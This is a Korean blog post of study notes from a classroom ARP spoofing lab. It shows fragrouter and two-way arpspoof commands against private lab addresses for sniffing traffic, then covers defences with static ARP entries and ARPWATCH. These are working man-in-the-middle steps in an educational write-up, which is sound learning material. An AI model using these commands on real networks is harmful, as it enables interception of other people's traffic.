티스토리 뷰

2.네트워크보안

ARP Spoofing 실습

222b 2019. 10. 15. 19:33

fragrouter //ip 포워드 기능을 해주는 도구, 툴

fragrouter -B1 //앞으로 페도라 리눅스 서버는 라우터 처럼 패킷 중계를 해줌 아이피 포워드 기능 활성화 한것 

arpspoof -i eth2 -t 192.168.197.129 192.168.197.156 타겟에 있는 156 정보를 공격자 BACKTRACK의 맥주소로 바꾸겠다 

 

그럼 

192.168.197.156 is-at 0:c:29:ba:2:17 //156 의 맥주소(백트랙의 맥주소)는 이거야 라고 arp reply를 계속 날림

 

시험에 나오는것 ★

arp -a 

에서 고유한 맥주소가 두개임  

계속 arp reply가 날아가기 때문에 계속 유지가 되는 것임

icmp echo reply가 나갈텐데

 

arpspoof -i -t 192.168.197.156 192.168.197.129 

//양방향으로 주고받는 패킷을 다 스니핑 함

arpspoof 라는 공격툴로인해 변조 되었다.

 

ipforward 기능이 동작해서 wireshark에 두개씩 찍힌거임

  

 

 

 

대응방법

 

arp 캐시를 정적으로 설정한다 

 페도라 서버의 주소를 정적으로 설정 

arp -a // 맥주소 정보 확인

arp -s 192.168.197.156 00-0c-29-0c-a6-c6

arp -a //으로 type이 static 인지 확인 

 

ping 이제대로 되면 이상 없는 것 

 

arpspoof -i eth2 -t 192.168.197.129 192.168.197.156//타겟에 대해서 156 정보를 변조하겠다 

다시 공격했는데 정적으로 설정된 주소는 안바뀜

arp 정적으로 구성 한다.

근데 시스템 종료 시 삭제가 되므로 기동시마다 ARP 캐시를 정적으로 구성해 주어야 한다. 

재부팅시 static 날라감

ARP 트래픽을 실시간으로 모니터링하는 프로그램 : ARPWATCH

 

 

공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2025/08   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
글 보관함